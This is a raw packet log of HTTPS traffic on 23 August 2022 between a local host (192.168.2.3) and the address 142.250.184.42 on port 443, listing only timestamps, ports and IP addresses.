Aug 23, 2022 03:43:41.902935982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.902973890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903001070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903031111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903059006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903089046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903125048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903167009 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903208971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903248072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903290033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903322935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903398037 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903434992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903464079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903495073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903523922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903553963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903584003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903615952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903651953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903681040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903708935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903743982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.903912067 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.904098988 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.904515028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904581070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904608965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904635906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904664993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904695034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904726028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904757023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904784918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904814005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904844046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904875994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904894114 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.904906988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904938936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904968023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.904999018 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.905026913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.905056953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.905086040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.905116081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.905647039 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.905862093 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.907286882 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907324076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907382011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907422066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907453060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907484055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907510042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907533884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907563925 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907593966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907625914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907654047 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907684088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907711983 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907742023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907780886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907814026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907830000 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.907845974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907879114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.907906055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908082008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908114910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908116102 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.908145905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908176899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908210039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908232927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908262014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908291101 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908323050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908351898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908380985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908411026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908438921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908468008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908498049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908526897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908557892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908585072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.908693075 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.909704924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909737110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909766912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909799099 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909828901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909859896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909888029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909915924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909945011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.909972906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910001040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910031080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910062075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910092115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910123110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910151958 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910181999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910198927 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.910211086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910239935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910269022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910298109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910329103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910357952 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910387039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910415888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910444021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910450935 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.910473108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910501003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910528898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910557985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910586119 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910614014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.910634041 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.910641909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911087036 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.911386967 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911477089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911520004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911560059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911652088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911693096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911734104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911775112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911818027 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911859035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911896944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911938906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.911978960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912024021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912066936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912110090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912156105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912197113 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912231922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912327051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912343979 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.912357092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912385941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912416935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912445068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912473917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912503004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912532091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912560940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912589073 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912590981 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.912619114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912648916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912678003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912709951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912753105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912792921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912833929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912877083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912915945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.912987947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913018942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913048983 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913079023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913105965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913137913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913167000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913197041 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913227081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913255930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913284063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913314104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913341999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913369894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913398981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913429022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913459063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913472891 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.913489103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913518906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913547993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913577080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913604975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913634062 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913661957 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913691998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913719893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913748026 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913775921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913841009 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913871050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913899899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913929939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913959980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.913990974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914587021 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.914730072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914762020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914791107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914823055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914854050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914884090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914913893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914943933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.914973974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915004015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915066004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915096998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915128946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915159941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915190935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915220022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915251017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915281057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915311098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915339947 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915465117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915493965 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915523052 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915529966 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.915555000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915646076 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915677071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915707111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915736914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915766001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915796995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915822029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915852070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915882111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915899038 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.915913105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915946007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.915975094 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916006088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916037083 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916065931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916095972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916126966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916157961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916251898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916282892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916311979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916342020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916372061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916403055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916433096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916465044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916495085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916523933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916554928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916584969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916614056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916642904 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916678905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916707993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916738033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916768074 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916799068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916829109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916857004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916887045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916917086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916944981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.916964054 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.917150974 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.917196989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917270899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917301893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917330980 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917361021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917390108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917418957 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917448044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917478085 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917517900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917547941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917577982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917608023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917638063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917676926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917687893 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.917701006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917726994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917752028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917773962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917798042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917819977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917843103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917866945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917891979 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917915106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917939901 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917963028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.917984962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918008089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918030024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918054104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918076992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918100119 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918126106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918148994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918173075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918196917 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918219090 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918241024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918262959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918284893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918308020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918329000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918349981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918371916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918390989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918474913 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.918653965 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.918759108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918785095 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918807030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918829918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918853045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918876886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918883085 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.918900013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918924093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918946028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.918967962 CEST	443	64969	142.250.184.42	192.168.2.3
